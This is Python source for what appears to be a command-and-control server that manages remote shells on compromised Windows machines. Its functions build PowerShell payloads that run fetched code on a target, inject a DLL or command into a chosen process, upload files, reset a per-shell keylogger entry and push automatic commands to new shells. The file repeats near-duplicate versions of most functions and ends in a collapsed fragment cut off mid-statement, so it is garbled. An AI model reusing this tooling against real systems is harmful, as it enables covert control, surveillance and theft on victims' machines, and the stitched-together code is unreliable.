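def exec_code(self, data):
    """Build the ``exec.ps1`` script around a base64-encoded resource.

    Args:
        data: Operator input of the form ``"<command> <path>"``. ``path`` is
            resolved with ``self.alias.get_alias`` and then loaded with
            ``Utils.load_file_unsafe`` when ``Utils.file_exists`` accepts
            it, otherwise with ``Utils.download_url``.

    Returns:
        The populated script text, ``""`` when the path argument is
        missing, or ``";"`` when the loader handed back ``";"``.
    """
    try:
        _, path = data.split(" ", 1)
    except ValueError:
        # Too few fields is the only expected failure; anything else
        # (including KeyboardInterrupt) should surface.
        UI.error("Missing arguments")
        return ""

    path = self.alias.get_alias(path)
    if Utils.file_exists(path, False, False):
        content = Utils.load_file_unsafe(path)
    else:
        content = Utils.download_url(path)

    # NOTE(review): ";" looks like the loaders' failure value -- confirm in
    # Utils; nothing in this block produces it.
    if content == ";":
        UI.error("Cannot fetch the resource")
        return content

    UI.success("Fetching %s" % path)
    # NOTE(review): the resource is embedded exactly as loaded; no size
    # limit or integrity check is visible in this block.
    encoded = base64.b64encode(content)
    ps = Utils.load_powershell_script("exec.ps1", 12)
    ps = Utils.update_key(ps, "PAYLOAD", encoded)
    UI.success("Payload should be executed shortly on the target")
    return ps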
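def start_httpd(config):
    """Start the HTTP(S) listener described by ``config`` and serve forever.

    Args:
        config: Settings object queried with ``get`` for ``http-host``,
            ``http-port``, ``https-enabled`` and ``https-cert-path``.
    """
    ip = config.get('http-host')
    try:
        port = int(config.get('http-port'))
    except (TypeError, ValueError):
        UI.error("(http-port) HTTP port need to be a integer.", True)
        # ``port`` is unbound on this path; stop here in case UI.error
        # returns instead of terminating.
        return

    print('\r\n')
    UI.success('Starting web server on %s port %d' % (ip, port))

    try:
        server_class = BaseHTTPServer.HTTPServer
        factory = HTTPDFactory(config)
        httpd_server = server_class((ip, port), factory)

        if config.get('https-enabled') == 'on':
            cert = config.get('https-cert-path')
            Utils.file_exists(cert, True)
            # NOTE(review): ssl.wrap_socket leaves protocol and cipher
            # selection to interpreter defaults and is deprecated since
            # Python 3.7 (removed in 3.12) in favour of ssl.SSLContext.
            # With no keyfile argument the private key must sit in the same
            # file as the certificate.
            httpd_server.socket = ssl.wrap_socket(httpd_server.socket,
                                                  certfile=cert)
            UI.success('Web server is using HTTPS')

        httpd_server.serve_forever()
    except Exception:
        # KeyboardInterrupt and SystemExit are deliberately not caught, so a
        # shutdown request is not reported as a port conflict.
        UI.error(
            'Server was not able to start (Port already in use?)... Aborting',
            True)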
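def inject(self, data):
    """Build the ``injector.ps1`` script for a command, architecture and PID.

    Args:
        data: Operator input ``"<option> <arch> <pid> <command>"``. ``arch``
            must be ``"32"`` or ``"64"`` and the command at most 4096
            characters long.

    Returns:
        The populated script text, or ``""`` when an argument is missing or
        fails validation.
    """
    archs = ["32", "64"]
    try:
        _option, arch, pid, cmd = data.split(" ", 3)
    except ValueError:
        # Too few fields is the only expected failure here.
        UI.error("Missing arguments")
        return ""

    if len(cmd) > 4096:
        UI.error("Your command is bigger than 4096 bytes")
        return ""

    if arch not in archs:
        UI.error("Invalid architecture provided (32/64)")
        return ""

    # ``arch`` was checked against the allowlist above, so the file name
    # built here can only be one of the two expected values.
    dll = Utils.load_file("bin/inject-%s.dll" % arch)
    # Swap the 4096-character run of "A" in the loaded file for the command,
    # NUL-padded to the same length.
    dll = dll.replace("A" * 4096, cmd + "\x00" * (4096 - len(cmd)))

    ps = Utils.load_powershell_script("injector.ps1", 1)
    ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(dll))
    # NOTE(review): ``pid`` is substituted as typed; no numeric check is
    # visible in this block.
    ps = Utils.update_key(ps, "PID", pid)

    UI.success("Injecting %s" % cmd)
    UI.success("Into %s bits process with PID %s" % (arch, pid))
    return ps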
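def upload_file(self, data):
    """Build the ``upload.ps1`` script for a resource and a remote path.

    Args:
        data: Operator input ``"<command> <path> <remote>"``. ``path`` is
            resolved with ``self.alias.get_alias`` and loaded with
            ``Utils.load_file_unsafe`` or ``Utils.download_url``;
            ``remote`` is substituted for the script's ``PATH`` key.

    Returns:
        The populated script text, ``""`` when arguments are missing, or
        ``";"`` when the loader handed back ``";"``.
    """
    try:
        _, path, remote = data.split(" ", 2)
    except ValueError:
        # Too few fields is the only expected failure here.
        UI.error("Missing arguments")
        return ""

    path = self.alias.get_alias(path)
    if Utils.file_exists(path, False, False):
        content = Utils.load_file_unsafe(path)
    else:
        content = Utils.download_url(path)

    # NOTE(review): ";" looks like the loaders' failure value -- confirm in
    # Utils; nothing in this block produces it.
    if content == ";":
        UI.error("Cannot fetch the resource")
        return content

    UI.success("Fetching %s" % path)
    encoded = base64.b64encode(content)
    ps = Utils.load_powershell_script("upload.ps1", 3)
    ps = Utils.update_key(ps, "PAYLOAD", encoded)
    # NOTE(review): ``remote`` is substituted as typed; no path validation
    # is visible in this block.
    ps = Utils.update_key(ps, "PATH", remote)
    # Report the destination; interpolating ``path`` here would show the
    # source of the resource instead of where it is written.
    UI.success("Payload will be saved at %s" % remote)
    return ps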
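def exec_code(self, data):
    """Wrap a local or downloaded resource in the ``exec.ps1`` template.

    Args:
        data: Operator input ``"<command> <path>"``; only ``path`` is used.

    Returns:
        The script with its ``PAYLOAD`` key replaced by the base64 form of
        the resource, ``""`` if ``path`` is missing, or ``";"`` if the
        loader returned ``";"``.
    """
    try:
        _, path = data.split(" ", 1)
    except ValueError:
        # Only a missing field is expected; do not mask other failures.
        UI.error("Missing arguments")
        return ""

    path = self.alias.get_alias(path)
    loader = (Utils.load_file_unsafe
              if Utils.file_exists(path, False, False)
              else Utils.download_url)
    content = loader(path)

    # NOTE(review): ";" is presumably what the loaders return on failure --
    # verify against Utils.
    if content == ";":
        UI.error("Cannot fetch the resource")
        return content

    UI.success("Fetching %s" % path)
    # The whole resource travels inside the script as one base64 value.
    encoded = base64.b64encode(content)
    ps = Utils.load_powershell_script("exec.ps1", 16)
    ps = Utils.update_key(ps, "PAYLOAD", encoded)
    UI.success("Payload should be executed shortly on the target")
    return ps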
def register(self, guid, data):
    """Store the prompt announced by a new shell and report it.

    Args:
        guid: Rebound from ``data`` before first use, so the value passed
            by the caller is never read.
        data: ``"<command> <guid> <prompt>"``.

    NOTE(review): the split is unpacked without a guard, so fewer than
    three fields raises ValueError. ``prompt`` and ``data`` reach the
    console and ``Log.log_event`` unmodified; if they originate from a
    remote client, control characters are not filtered here.
    """
    _, guid, prompt = data.split(" ", 2)
    self.db.set_prompt(guid, prompt)
    shell_id = self.db.get_id(guid)

    print("")
    UI.success("Registering new shell %s" % prompt)
    UI.success("New shell ID %s GUID is %s" % (shell_id, guid))
    Log.log_event("New Shell", data)
def get_autocommands(self, guid):
    """Queue each auto command from the profile for the shell ``guid``.

    Nothing is queued unless the profile's ``autocommands`` entry is a
    list. Commands are taken from configuration and pushed without any
    per-command confirmation.
    """
    autocommands = self.config.get("profile").get("autocommands")
    if not isinstance(autocommands, list):
        return

    UI.success("Running auto commands on shell %s" % guid)
    for entry in autocommands:
        print("[+] %s" % entry)
        # A fresh identifier from Utils.guid() accompanies every command.
        self.db.push_cmd(guid, entry, Utils.guid(),
                         self.config.get("username"))
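def set_alias(self, data):
    """Register a custom alias from ``"<command> <key> <value>"``.

    Args:
        data: Operator input; ``value`` keeps any further spaces.

    Returns:
        Always ``""``.
    """
    try:
        _, key, value = data.split(" ", 2)
    except ValueError:
        # Too few fields is the only expected failure; a wider handler
        # would also hide KeyboardInterrupt and SystemExit.
        UI.error("Missing arguments")
        return ""

    # NOTE(review): key and value are stored as typed; the fetch-style
    # commands later resolve paths through this alias table.
    self.alias.set_custom(key, value)
    UI.success("%s is now set to %s" % (key, value))
    return ""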
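def set_alias(self, data):
    """Store ``value`` under ``key`` in the custom alias table.

    Args:
        data: Operator input ``'<command> <key> <value>'``.

    Returns:
        Always ``''``.
    """
    try:
        (_, key, value) = data.split(' ', 2)
    except ValueError:
        # Only a short argument list is expected to fail here.
        UI.error('Missing arguments')
        return ''

    self.alias.set_custom(key, value)
    UI.success('%s is now set to %s' % (key, value))
    return ''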
def get_cmd_send(self):
    """Announce and delete every command row returned for this session uid.

    Returns:
        Element 0 of the last row processed, or ``False`` when
        ``self.sql.get_cmd`` yields nothing.
    """
    last_guid = False
    session_uid = self.config.get("uid")
    for row in self.sql.get_cmd(session_uid):
        print("")
        # NOTE(review): column meanings are inferred from use only --
        # row[4] is shown as the label, row[1] keys the command text.
        label = row[4]
        text = self.sql.get_cmd_data(row[1])
        UI.success("[%s] Sending command: %s" % (label, text))
        self.sql.delete_cmd(row[0], row[2], row[1], row[3])
        last_guid = row[0]
    return last_guid
def get_cmd_send(self):
    """Announce and delete every command row returned for this session uid.

    Returns:
        ``'exit'`` when the last row's command text is ``'exit'``,
        otherwise element 0 of the last row, or ``False`` when there were
        no rows.
    """
    result = False
    session_uid = self.config.get('uid')
    for row in self.sql.get_cmd(session_uid):
        print('')
        text = self.sql.get_cmd_data(row[1])
        # NOTE(review): column meanings are inferred from use only.
        UI.success('%s - Sending command: %s' % (row[4], text))
        self.sql.delete_cmd(row[0], row[2], row[1], row[3])
        # An 'exit' command replaces the row's first element as the result.
        result = 'exit' if text == 'exit' else row[0]
    return result
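def set_alias(self, data):
    """Add or replace a custom alias.

    Args:
        data: Operator input ``"<command> <key> <value>"``; everything
            after the second space becomes ``value``.

    Returns:
        Always ``""``.
    """
    try:
        _, key, value = data.split(" ", 2)
    except ValueError:
        # Unpacking fails with ValueError when fewer than three fields are
        # present; nothing else is expected or handled here.
        UI.error("Missing arguments")
        return ""

    self.alias.set_custom(key, value)
    UI.success("%s is now set to %s" % (key, value))
    return ""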
def register(self, guid, data):
    """Store a new shell's prompt, report it and queue its auto commands.

    Args:
        guid: Rebound from ``data`` before first use, so the value passed
            by the caller is never read.
        data: ``"<command> <guid> <prompt>"``.

    NOTE(review): fewer than three fields raises ValueError because the
    split is unpacked without a guard. ``prompt`` and ``data`` are echoed
    and logged unmodified; if they come from a remote client, control
    characters are not filtered here.
    """
    _, guid, prompt = data.split(" ", 2)
    self.db.set_prompt(guid, prompt)
    shell_id = self.db.get_id(guid)

    print("")
    UI.success("Registering new shell %s" % prompt)
    UI.success("New shell ID %s GUID is %s" % (shell_id, guid))
    Log.log_event("New Shell", data)

    self.get_autocommands(guid)
    # The auto-interact setting is read, but no action is implemented.
    if self.config.get("auto-interact") == "on":
        pass
def get_autocommands(self, guid):
    """Queue and log each profile auto command for the shell ``guid``.

    Nothing happens unless the profile's ``autocommands`` entry is a list.
    Each command is written to the shell log and the shell's stored output
    before it is pushed, which leaves an audit trail of what was queued.
    """
    autocommands = self.config.get("profile").get("autocommands")
    if not isinstance(autocommands, list):
        return

    # The display name is the second space-separated field of the stored
    # prompt; a prompt without a space raises IndexError here.
    prompt_fields = self.db.get_prompt(guid).decode().split(" ")
    shell = prompt_fields[1]
    UI.success("Running auto commands on shell %s" % shell)
    Log.log_event("Running auto commands on shell", shell)

    for entry in autocommands:
        print("\t[+] %s" % entry)
        Log.log_shell(guid, "Sending", entry)
        record = "[%s] AutoCommand Sending: \n%s\n\n" % (Utils.timestamp(), entry)
        self.db.append_shell_data(guid, record)
        self.db.push_cmd(guid, entry, Utils.guid(),
                         self.config.get("username"))
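def inject(self, data):
    """Build the ``injector.ps1`` script for a command and a PID.

    Args:
        data: Operator input ``"<option> <pid> <command>"``.

    Returns:
        The populated script text, or ``""`` when arguments are missing.
    """
    try:
        (_option, pid, cmd) = data.split(" ", 2)
    except ValueError:
        # Too few fields is the only expected failure here.
        UI.error("Missing arguments")
        return ""

    ps = Utils.load_powershell_script("injector.ps1", 1)
    ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(cmd))
    # NOTE(review): ``pid`` is substituted as typed; no numeric check is
    # visible in this block.
    ps = Utils.update_key(ps, "PID", pid)

    UI.success("Injecting %s" % cmd)
    UI.success("Into process with PID %s" % pid)
    return ps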
def register(self, guid, data):
    """Store a new shell's prompt, reset its keylogger key and report it.

    Args:
        guid: Rebound from ``data`` before first use, so the value passed
            by the caller is never read.
        data: ``'<command> <guid> <prompt>'``.

    NOTE(review): the split is unpacked without a guard (ValueError on
    fewer than three fields), and ``prompt``/``data`` are echoed and
    logged unmodified; if they come from a remote client, control
    characters are not filtered here.
    """
    fields = data.split(' ', 2)
    (_, guid, prompt) = fields
    self.db.set_prompt(guid, prompt)
    shell_id = self.db.get_id(guid)

    print('')
    UI.success('Registering new shell %s' % prompt)
    UI.success('New shell ID %s GUID is %s' % (shell_id, guid))

    # The per-shell "<guid>:keylogger" entry starts out empty.
    keylog_key = "%s:keylogger" % guid
    self.db.set_key(keylog_key, "")
    Log.log_event('New Shell', data)

    self.get_autocommands(guid)
    # The auto-interact setting is read, but no action is implemented.
    if self.config.get('auto-interact') == 'on':
        pass
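def inject(self, data):
    """Fill the ``injector.ps1`` template with a command and a PID.

    Args:
        data: Operator input ``'<option> <pid> <command>'``.

    Returns:
        The populated script text, or ``''`` when arguments are missing.
    """
    try:
        (_option, pid, cmd) = data.split(' ', 2)
    except ValueError:
        # Only a short argument list is expected to fail here.
        UI.error('Missing arguments')
        return ''

    encoded = base64.b64encode(cmd)
    ps = Utils.load_powershell_script('injector.ps1', 1)
    ps = Utils.update_key(ps, 'PAYLOAD', encoded)
    # NOTE(review): ``pid`` is substituted as typed; no numeric check is
    # visible in this block.
    ps = Utils.update_key(ps, 'PID', pid)

    UI.success('Injecting %s' % cmd)
    UI.success('Into process with PID %s' % pid)
    return ps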
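def inject(self, data):
    """Return ``injector.ps1`` with its PAYLOAD and PID keys filled in.

    Args:
        data: Operator input ``"<option> <pid> <command>"``. The command
            is base64-encoded before substitution.

    Returns:
        The populated script text, or ``""`` when arguments are missing.
    """
    try:
        _option, pid, cmd = data.split(" ", 2)
    except ValueError:
        # Unpacking raises ValueError on fewer than three fields; other
        # exceptions are left to propagate.
        UI.error("Missing arguments")
        return ""

    ps = Utils.load_powershell_script("injector.ps1", 1)
    replacements = (("PAYLOAD", base64.b64encode(cmd)), ("PID", pid))
    # NOTE(review): ``pid`` is substituted as typed; no numeric check is
    # visible in this block.
    for key, value in replacements:
        ps = Utils.update_key(ps, key, value)

    UI.success("Injecting %s" % cmd)
    UI.success("Into process with PID %s" % pid)
    return ps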
def register(self, guid, data):
    """Store a new shell's prompt, reset its keylogger key and report it.

    Args:
        guid: Rebound from ``data`` before first use, so the value passed
            by the caller is never read.
        data: ``"<command> <guid> <prompt>"``; anything that is not
            exactly ``str`` is decoded first.

    NOTE(review): the split is unpacked without a guard (ValueError on
    fewer than three fields), and ``prompt``/``data`` are echoed and
    logged unmodified; if they come from a remote client, control
    characters are not filtered here.
    """
    text = data if type(data) is str else data.decode()
    (_, guid, prompt) = text.split(" ", 2)
    self.db.set_prompt(guid, prompt)
    shell_id = self.db.get_id(guid).decode()

    print("")
    UI.success("Registering new shell %s" % prompt)
    UI.success("New shell ID %s GUID is %s" % (shell_id, guid))

    # The per-shell "<guid>:keylogger" entry starts out empty.
    self.db.set_key("%s:keylogger" % guid, "")
    Log.log_event("New Shell", text)

    self.get_autocommands(guid)
    # The auto-interact setting is read, but no action is implemented.
    if self.config.get("auto-interact") == "on":
        pass
def get_autocommands(self, guid):
    """Queue and log each profile auto command for the shell ``guid``.

    Nothing happens unless the profile's ``autocommands`` entry is a list.
    Each command is written to the shell log and the shell's stored output
    before it is pushed.
    """
    autocommands = self.config.get('profile').get('autocommands')
    if not isinstance(autocommands, list):
        return

    UI.success('Running auto commands on shell %s' % guid)
    Log.log_event('Running auto commands on shell', guid)

    for entry in autocommands:
        print('\t[+] %s' % entry)
        Log.log_shell(guid, 'Sending', entry)
        record = "[%s] AutoCommand Sending: \n%s\n" % (Utils.timestamp(), entry)
        self.db.append_shell_data(guid, record)
        self.db.push_cmd(guid, entry, Utils.guid(),
                         self.config.get('username'))
def start_httpd(config):
    """Start the HTTP(S) listener described by ``config`` and serve forever.

    Reads ``http-host``, ``http-port``, ``https-enabled`` and
    ``https-cert-path`` from ``config``. No exception is handled here: a
    non-numeric port or a failed bind propagates to the caller.
    """
    host = config.get("http-host")
    port = int(config.get("http-port"))
    UI.success("Starting web server on %s port %d" % (host, port))

    httpd_server = BaseHTTPServer.HTTPServer((host, port), HTTPDFactory(config))

    tls_enabled = config.get("https-enabled") == "on"
    if tls_enabled:
        cert_path = config.get("https-cert-path")
        Utils.file_exists(cert_path, True)
        # NOTE(review): ssl.wrap_socket leaves protocol and cipher selection
        # to interpreter defaults and is deprecated since Python 3.7
        # (removed in 3.12) in favour of ssl.SSLContext. With no keyfile
        # argument the private key must sit in the certificate file.
        httpd_server.socket = ssl.wrap_socket(httpd_server.socket,
                                              certfile=cert_path)
        UI.success("Web server is using HTTPS")

    httpd_server.serve_forever()
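def fetch(self, data):
    """Return a loaded resource followed by an operator-supplied statement.

    Args:
        data: Operator input ``'<command> <path> <statement>'``. ``path``
            is resolved with ``self.alias.get_alias`` and loaded with
            ``Utils.load_file_unsafe`` or ``Utils.download_url``.

    Returns:
        ``'<resource>;<statement>'``, or ``''`` when arguments are missing
        or the loader handed back ``';'``.
    """
    try:
        (_, path, ps) = data.split(' ', 2)
    except ValueError:
        # Too few fields is the only expected failure here.
        UI.error('Missing arguments')
        return ''

    path = self.alias.get_alias(path)
    if Utils.file_exists(path, False, False):
        content = Utils.load_file_unsafe(path)
    else:
        content = Utils.download_url(path)

    # NOTE(review): ';' looks like the loaders' failure value -- confirm in
    # Utils; nothing in this block produces it.
    if content == ';':
        UI.error('Cannot fetch the resource')
        return ''

    UI.success('Fetching %s' % path)
    UI.success('Executing %s' % ps)
    # NOTE(review): resource and statement are joined as-is; no integrity
    # check on downloaded content is visible in this block.
    return '%s;%s' % (content, ps)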
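def fetch(self, data):
    """Join a loaded resource and a trailing statement with ``";"``.

    Args:
        data: Operator input ``"<command> <path> <statement>"``.

    Returns:
        ``"<resource>;<statement>"``, or ``""`` when arguments are missing
        or the loader handed back ``";"``.
    """
    try:
        (_, path, ps) = data.split(" ", 2)
    except ValueError:
        # Only a short argument list is expected to fail here.
        UI.error("Missing arguments")
        return ""

    path = self.alias.get_alias(path)
    loader = (Utils.load_file_unsafe
              if Utils.file_exists(path, False, False)
              else Utils.download_url)
    content = loader(path)

    # NOTE(review): ";" is presumably what the loaders return on failure --
    # verify against Utils.
    if content == ";":
        UI.error("Cannot fetch the resource")
        return ""

    UI.success("Fetching %s" % path)
    UI.success("Executing %s" % ps)
    return "%s;%s" % (content, ps)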
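def register(self, guid, data):
    """Store a new shell's prompt, send a notification and report it.

    Args:
        guid: Rebound from ``data`` before first use, so the value passed
            by the caller is never read.
        data: ``"<command> <guid> <prompt>"`` as ``str``, or an object
            whose ``decode()`` yields that text.

    NOTE(review): the split is unpacked without a guard (ValueError on
    fewer than three fields), and ``prompt``/``data`` are echoed, mailed
    and logged unmodified; if they come from a remote client, control
    characters are not filtered here.
    """
    # isinstance also accepts str subclasses, which have no decode().
    if not isinstance(data, str):
        data = data.decode()
    (_, guid, prompt) = data.split(" ", 2)
    self.db.set_prompt(guid, prompt)
    index = self.db.get_id(guid).decode()

    print("")
    UI.success("Registering new shell %s" % prompt)
    UI.success("New shell ID %s GUID is %s" % (index, guid))

    try:
        # NOTE(review): ``config`` is not bound in this method. Unless a
        # module-level ``config`` exists this raises NameError, which the
        # handler below reports as a failed notification; ``self.config``
        # may have been intended -- confirm.
        notify = EmailNotify(config)
        notify.send_notification("NEW SHELL callback: %s" % prompt)
    except Exception:
        # Notification is best-effort, but KeyboardInterrupt and SystemExit
        # must still get through.
        UI.error("Notification failed", False)

    # The per-shell "<guid>:keylogger" entry starts out empty.
    self.db.set_key("%s:keylogger" % guid, "")
    Log.log_event("New Shell", data)
    self.get_autocommands(guid)
    # The auto-interact setting is read, but no action is implemented.
    if self.config.get("auto-interact") == "on":
        pass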
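def fetch(self, data):
    """Load a resource and append an operator-supplied statement to it.

    Args:
        data: Operator input ``"<command> <path> <statement>"``; the
            statement keeps any further spaces.

    Returns:
        ``"<resource>;<statement>"``, or ``""`` when arguments are missing
        or the loader handed back ``";"``.
    """
    try:
        _, path, ps = data.split(" ", 2)
    except ValueError:
        # Unpacking raises ValueError on fewer than three fields; other
        # exceptions are left to propagate.
        UI.error("Missing arguments")
        return ""

    path = self.alias.get_alias(path)
    if Utils.file_exists(path, False, False):
        content = Utils.load_file_unsafe(path)
    else:
        # NOTE(review): anything that is not an accepted local file is
        # handed to the downloader; no scheme or host restriction is
        # visible in this block.
        content = Utils.download_url(path)

    if content == ";":
        UI.error("Cannot fetch the resource")
        return ""

    UI.success("Fetching %s" % path)
    UI.success("Executing %s" % ps)
    return "%s;%s" % (content, ps)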
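def exec_code(self, data):
    """Fill the ``exec.ps1`` template with a base64-encoded resource.

    Args:
        data: Operator input ``'<command> <path>'``. ``path`` is resolved
            with ``self.alias.get_alias`` and loaded with
            ``Utils.load_file_unsafe`` or ``Utils.download_url``.

    Returns:
        The populated script text, ``''`` when the path argument is
        missing, or ``';'`` when the loader handed back ``';'``.
    """
    try:
        (_, path) = data.split(' ', 1)
    except ValueError:
        # Too few fields is the only expected failure here.
        UI.error('Missing arguments')
        return ''

    path = self.alias.get_alias(path)
    if Utils.file_exists(path, False, False):
        content = Utils.load_file_unsafe(path)
    else:
        content = Utils.download_url(path)

    # NOTE(review): ';' looks like the loaders' failure value -- confirm in
    # Utils; nothing in this block produces it.
    if content == ';':
        UI.error('Cannot fetch the resource')
        return content

    UI.success('Fetching %s' % path)
    encoded = base64.b64encode(content)
    ps = Utils.load_powershell_script('exec.ps1', 16)
    ps = Utils.update_key(ps, 'PAYLOAD', encoded)
    UI.success('Payload should be executed shortly on the target')
    return ps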
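def start_httpd(config):
    """Start the HTTP(S) listener described by ``config`` and serve forever.

    Args:
        config: Settings object queried with ``get`` for ``http-host``,
            ``http-port``, ``https-enabled`` and ``https-cert-path``.
    """
    ip = config.get("http-host")
    try:
        port = int(config.get("http-port"))
    except (TypeError, ValueError):
        UI.error("(http-port) HTTP port need to be a integer.", True)
        # ``port`` is unbound on this path; stop here in case UI.error
        # returns instead of terminating.
        return

    UI.warn("Starting web server on %s port %d" % (ip, port))

    try:
        server_class = http.server.HTTPServer
        factory = HTTPDFactory(config)
        httpd_server = server_class((ip, port), factory)

        if config.get("https-enabled") == "on":
            cert = config.get("https-cert-path")
            Utils.file_exists(cert, True)
            # NOTE(review): ssl.wrap_socket is deprecated since Python 3.7
            # and removed in 3.12, so this branch raises AttributeError
            # there and ends up in the handler below. It also leaves
            # protocol and cipher selection to interpreter defaults;
            # ssl.SSLContext is the supported replacement. With no keyfile
            # argument the private key must sit in the certificate file.
            httpd_server.socket = ssl.wrap_socket(httpd_server.socket,
                                                  certfile=cert)
            UI.success("Web server is using HTTPS")

        httpd_server.serve_forever()
    except Exception:
        # Print the real cause first: the message below guesses at a port
        # conflict whatever the exception was.
        exc_value, exc_tb = sys.exc_info()[1:]
        print("%s, %s" % (exc_value, exc_tb))
        UI.error("Server was not able to start (Port already in use?)... Aborting", True)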
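def start_httpd(config):
    """Start the HTTP(S) listener described by ``config`` and serve forever.

    Args:
        config: Settings object queried with ``get`` for ``http-host``,
            ``http-port``, ``https-enabled`` and ``https-cert-path``.

    NOTE(review): the port conversion sits outside the ``try`` block, so a
    missing or non-numeric ``http-port`` raises to the caller.
    """
    ip = config.get("http-host")
    port = int(config.get("http-port"))

    print("\r\n")
    UI.success("Starting web server on %s port %d" % (ip, port))

    try:
        server_class = BaseHTTPServer.HTTPServer
        factory = HTTPDFactory(config)
        httpd_server = server_class((ip, port), factory)

        if config.get("https-enabled") == "on":
            cert = config.get("https-cert-path")
            Utils.file_exists(cert, True)
            # NOTE(review): ssl.wrap_socket leaves protocol and cipher
            # selection to interpreter defaults and is deprecated since
            # Python 3.7 (removed in 3.12) in favour of ssl.SSLContext.
            # With no keyfile argument the private key must sit in the
            # certificate file.
            httpd_server.socket = ssl.wrap_socket(httpd_server.socket,
                                                  certfile=cert)
            UI.success("Web server is using HTTPS")

        httpd_server.serve_forever()
    except Exception:
        # KeyboardInterrupt and SystemExit are deliberately not caught, so a
        # shutdown request is not reported as a port conflict.
        UI.error(
            "Server was not able to start (Port already in use?)... Aborting",
            True)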
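def upload_file(self, data):
    """Fill the ``upload.ps1`` template with a resource and a remote path.

    Args:
        data: Operator input ``'<command> <path> <remote>'``. ``path`` is
            resolved with ``self.alias.get_alias`` and loaded with
            ``Utils.load_file_unsafe`` or ``Utils.download_url``;
            ``remote`` is substituted for the script's ``PATH`` key.

    Returns:
        The populated script text, ``''`` when arguments are missing, or
        ``';'`` when the loader handed back ``';'``.
    """
    try:
        (_, path, remote) = data.split(' ', 2)
    except ValueError:
        # Only a short argument list is expected to fail here.
        UI.error('Missing arguments')
        return ''

    path = self.alias.get_alias(path)
    if Utils.file_exists(path, False, False):
        content = Utils.load_file_unsafe(path)
    else:
        content = Utils.download_url(path)

    # NOTE(review): ';' is presumably what the loaders return on failure --
    # verify against Utils.
    if content == ';':
        UI.error('Cannot fetch the resource')
        return content

    UI.success('Fetching %s' % path)
    encoded = base64.b64encode(content)
    ps = Utils.load_powershell_script('upload.ps1', 3)
    ps = Utils.update_key(ps, 'PAYLOAD', encoded)
    # NOTE(review): ``remote`` is substituted as typed; no path validation
    # is visible in this block.
    ps = Utils.update_key(ps, 'PATH', remote)
    # Report the destination; interpolating ``path`` here would show the
    # source of the resource instead of where it is written.
    UI.success('Payload will be saved at %s' % remote)
    return ps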
profile = CONFIG(profile) config.set("profile", profile) uid = Utils.guid() config.set("uid", uid) config.set("username", "(CLI)%s" % sys.argv[2]) db = RedisQuery(config) sql = MySQLQuery(config) sql.install_db().init_uid() config.set("redis", db) config.set("mysql", sql) db.update_config(config).init_sql() UI.success("Current Active session UUID is %s" % config.get("uid")) # Launch the HTTPD daemon if not "-nohttpd" in sys.argv: httpd_thread = init_httpd_thread(config) cli = Cli(config) while True: try: cmd = cli.prompt() cli.parse_cmd(cmd) except KeyboardInterrupt as e: UI.error("*** You really want to exit the application? *** (yes/no)") if UI.prompt("Exit").lower() == "yes":